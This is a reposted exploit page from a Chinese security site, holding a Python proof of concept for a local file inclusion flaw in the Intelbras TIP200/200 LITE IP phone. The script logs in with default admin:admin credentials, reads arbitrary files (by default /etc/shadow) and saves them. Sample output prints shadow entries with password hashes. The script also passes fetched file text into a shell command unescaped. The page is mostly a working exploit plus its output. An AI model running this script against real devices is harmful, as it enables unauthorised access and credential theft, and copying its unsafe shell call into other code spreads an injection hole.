首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Intelbras Telefone IP TIP200 LITE - Local File Disclosure
来源:https://www.facebook.com/anhaxteam/ 作者:anhax0r 发布时间:2018-03-21  
# Exploit Title: [INTELBRAS TELEFONE IP TIP200/200 LITE Local File Include]
# Google Dork: []
# Date: 16/03/2018
# Exploit Author: [Matheus Goncalves - anhax0r]
# Vendor Homepage: [https://www.facebook.com/anhaxteam/]
# Software Link: []
# Version: [60.0.75.29] (REQUIRED)
# Tested on: [Debian]
# CVE : [if applicable]
 
 
#Remember that you need login with admin credentials to download files !!! in this case, i used default credentials
 
import requests as http
import subprocess
import os
from requests.auth import HTTPBasicAuth
def poc():
    print("""                -------------------------------------------------------------------------------------------------------------
                ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include | Local File Download-------------------
                -------------      P0c Author: Matheus Goncalves | Pentester at Anhax Security Team       -------------------
                -------------------------------------------------------------------------------------------------------------\n""")
    filename = raw_input("filename Ex: /etc/shadow: -> ")
    if(filename == ""):
        filename="/etc/shadow"
    r = http.get("http://192.168.0.207/cgi-bin/cgiServer.exx?page="+str(filename), auth=HTTPBasicAuth('admin', 'admin'))
    print(" ")
    text = r.text
    
    print(text)
    savefile = raw_input("Save file? [Y\\n]: ")
    savefile.upper()
    if(savefile=="Y" or savefile=="y"):
        os.system("echo '"+text+"' > "+filename.replace("/etc/", ""))
        print("File saved !!")
        start()
    else:
        start()
            
def start():
    poc()
    
start()
 
 
#root@hax:~/itscanner# python p0c.py
#                -------------------------------------------------------------------------------------------------------------
#                ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include |-------------------
#                -------------      P0c Author: Matheus Goncalves | Pentester at Anhax Security Team       -------------------
#                -------------------------------------------------------------------------------------------------------------
#filename Ex: /etc/shadow: -> /etc/shadow
 
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::
 
#Save file? [Y\n]: y
#File saved !!
 
#root@hax:~/itscanner# cat shadow
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kamailio 5.1.1 / 5.1.0 / 5.0.0
·Cisco node-jos < 0.11.0 - Re-s
·Microsoft Windows - Desktop Br
·Linux Kernel < 4.15.4 - 'show_
·Internet Explorer - 'RegExp.la
·Kaseya Virtual System Administ
·Microsoft Windows Kernel - 'nt
·ModSecurity For Nginx Use-Afte
·Microsoft Windows Kernel - 'nt
·Android Bluetooth - BNEP bnep_
·Microsoft Windows Kernel - 'Nt
·Android Bluetooth - BNEP BNEP_
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved